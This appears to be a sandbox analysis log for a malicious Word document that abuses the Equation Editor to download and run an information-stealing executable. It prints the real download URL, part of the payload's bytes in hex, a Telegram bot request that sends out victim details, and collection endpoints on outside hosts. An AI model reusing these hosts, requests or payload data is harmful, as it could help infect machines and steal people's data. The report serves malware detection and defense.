                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.123:80 -> 192.168.2.22:49161
                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.123:80 -> 192.168.2.22:49161
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ACB15 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_002ACB15
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 217.12.218.219:587
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Thu, 26 Sep 2024 07:19:21 GMTContent-Type: application/x-msdos-programContent-Length: 708096Connection: keep-aliveLast-Modified: Thu, 26 Sep 2024 03:39:16 GMTETag: "ace00-622fd7b9e4c97"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa d6 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a8 0a 00 00 24 00 00 00 00 00 00 9e c6 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c c6 0a 00 4f 00 00 00 00 e0 0a 00 ac 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 a6 0a 00 00 20 00 00 00 a8 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 20 00 00 00 e0 0a 00 00 22 00 00 00 aa 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 c6 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 59 00 00 5c 35 00 00 03 00 00 00 1e 00 00 06 2c 8f 00 00 20 37 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 7c 00 00 00 00 00 00 00 02 28 15 00 00 0a 00 00 02 03 16 9a 28 16 00 00 0a 7d 08 00 00 04 02 02 7b 08 00 00 04 28 02 00 00 06 7d 01 00 00 04 02 03 17 9a 28 17 00 00 0a 7d 02 00 00 04 02 03 18 9a 28 17 00 00 0a 7d 04 00 00 04 02 03 19 9a 28 17 00 00 0a 7d 05 00 00 04 02 03 1a 9a 28 17 00 00 0a 7d 03 00 00 04 02 03 1b 9a 28 18 00 00 0a 7d 06 00 00 04 02 03 1c 9a 28 17 00 00 0a 7d 07 00 00 04 2a 13 30 02 00 21 00 00 00 01 00 00 11 00 0f 00 28 19 00 00 0a 20 6c 07 00 00 59 20 6d 01 00 00 5a 0f 00 28 1a 00 00 0a 58 0a 2b 00 06 2a 00 00 00 13 30 05 00 6d 01 00 00 02 00 00 11 02 73 1b 00 00 0a 7d 09 00 00 04 02 20 80 96 98 00 7d 0a 00 00 04 02 23 00 00 00 00 d0 12 63 41 7d 0b 00 00 04 02 20 80 69 67 ff 7d 0c 00 00 04 02 23 00 00 00 00 d0 12 63 c1 7d 0d 00 00 04 02 20 0f 27 00 00 17 17 73 1c 00 00 0a 7d 0e 00 00 04 02 17 17 17 73 1c 00 00 0a 7d 0f 00 00 04 02 16 7d 10 00 00 04 02 16 7d 11 00 00 04 02 28 15 00 00 0a 00 00 03 28 1d 00
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%209/26/2024%20/%206:20:30%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: ITLDC-NLUA ITLDC-NLUA
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49162 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49165 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49170 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49164 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 217.12.218.219:587
                Source: global trafficHTTP traffic detected: GET /txt/XcsQpLjhNNvxYtrw.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ACB15 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_002ACB15
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E2DECFB2-ADA4-4B5F-990B-FC73115868E7}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%209/26/2024%20/%206:20:30%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /txt/XcsQpLjhNNvxYtrw.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: mail.jhxkgroup.online
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 07:19:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exe
                Source: EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeC:
                Source: EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exee
                Source: EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exej
                Source: EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeuuC:
                Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005B80000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crt0
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: hgqilegacy20306.exe, 00000008.00000002.918185531.0000000005AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
